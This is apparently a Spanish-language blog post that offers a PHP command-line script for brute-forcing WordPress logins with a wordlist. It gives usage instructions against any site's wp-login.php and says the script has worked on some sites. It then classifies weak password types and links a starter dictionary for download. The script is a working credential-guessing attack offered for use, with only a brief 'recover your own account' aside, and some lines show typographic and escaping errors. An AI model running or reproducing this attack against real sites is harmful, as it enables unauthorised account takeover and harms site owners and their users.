WordPress no cuenta con un captcha por defecto ni tampoco con login throttling, o algo que limite los intentos de ingreso de usuario y clave para los usuarios, por lo que practicar fuerza bruta para ingresar como alguno de los usuarios registrados es algo que podemos intentar. Muchos sistemas de ingreso no cuentan con este tipo de protección o validación, por lo que este script no sólo se puede usar contra wordpress.
Hemos escrito un pequeño programa en PHP que nos permitirá ingresar al sistema de login de wordpress probando claves desde un diccionario de palabras.
1. < ?php
2. ini_set("memory_limit", "100M");
3. function crackSite($wordlist, $url, $user, $attemps = 0)
4. {
5. if($file = file($wordlist))
6. print "Read ".count($file)." words.n";
7. else
8. {
9. print "Can’t read word list file.n";
10. die();
11. }
12. $i = 0;
13. rtrim($fields_string,‘&’);
14. foreach($file as $word)
15. {
16. if(++$i%10 == 0)
17. print "Attempts: ".$i."/".count($file)." (".trim($word).")n";
18. $fields_string = "log=".$user."&pwd=".trim($word);
19. $ch = curl_init();
20. curl_setopt($ch,CURLOPT_URL,$url);
21. curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
22. curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
23. $result = md5( curl_exec($ch) );
24. if(!$oresult) $oresult = $result;
25. if($oresult != $result)
26. {
27. print "Password found: ".$word."n";
28. die();
29. }
30. curl_close($ch);
31. }
32. }
33. crackSite($argv[1], $argv[2], $argv[3]);
34. ?>
Este script esta diseñado para correrlo desde la linea de comandos (php-cli) y su modo de uso es el siguiente:
dijo:$ php wp_cracker.php wordlist.txt http://sitio.com/wp-login.php Username
Nótese que el script en ningún momento valida datos de entrada y salida, por lo que depende de la persona que lo ejecute que los parámetros estén bien. Se ha probado este script con algunos sitios y ha funcionado, puede que para otros sitios sea necesario hacer algunas modificaciones. El primer parámetro corresponde al fichero que contiene nuestro diccionario de palabras, el segundo a la URL que el script debe hacer post y el tercero al usuario.
Lo único que debemos saber es el nombre de usuario que existe en el registro del sitio. Para intentar ingresar a otros sitios es necesario modificar el código fuente y cambiar los nombres de los campos.
Requerimientos: Curl y PHP.
Les dejo un video que muestra el uso del script, aunque sinceramente, no se alcanza a ver un joraca
Pero bue.... por ahi a alguien le sirve
Me gustaría hacer un análisis de los tipos de passwords que son inseguros, los he clasificado de la siguiente manera:
* Numéricos: Generalmente del 1 al 10000000, por ejemplo 18528287, 20398476, 00000000, todas las combinaciones posibles. Muchas personas utilizan este tipo de contraseña ya que puede pertenecer a su número de identificacion (dni), numero de teléfono de casa o celular o simplemente porque es su número de la suerte. Lo que no saben es lo FACIL que es romper este tipo de password. Si pensamos en 10 millones de posibilidades (como mínimo), seguramente obtendremos el password en 6 o 7 días.
* Nombre + número: Con este tipo, me refiero al tipo de password como ‘fernando2008′, es decir, nombre, apellido, nick + fecha de nacimiento, edad o algún número que lo identifique. La mayoría de los nombres y apellidos están en diccionarios de datos y los números son fáciles de generar y no complicarían mucho el querer romper la contraseña. Yo diría que este tipo de password es una de las más fáciles e incluyen claves como: 123nombre456, qwertynombre, nombre123, nombre2009, nombre1975, etc etc.
* Nombre: Aunque parezca absurdo e increíble, es la realidad. Si, existe gente que utiliza su nombre como contraseña de una o más de sus cuentas. Y si, lo hace con minúscula.
* Palabra: Al igual que el anterior, aunque parezca increíble, existe gente que usa una palabra común y corriente como clave, como siperman, bicharraco, computador, celular, system, etc. Palabras que están en cualquier diccionario de palabras y que son fácilmente crackeables.
Estos 4 tipos de password son, basicamente, los más fáciles de identificar y de romper. Estos tipos de claves son fáciles de romper vía fuerza bruta ya sea con repetidos intentos de login en un sistema inseguro (por ej. Un sistema sin captcha) y son sencillos de encontrar su hash correspondientes ya sea de sha, md5 u otro.
De yapa les dejo un diccionario como para empezar, no es muy completo, pero SIRVE.
Si van a probar el método para recuperar una cuenta, tendrían que armarse un diccionario con sus propias posibles contraseñas.
Descargar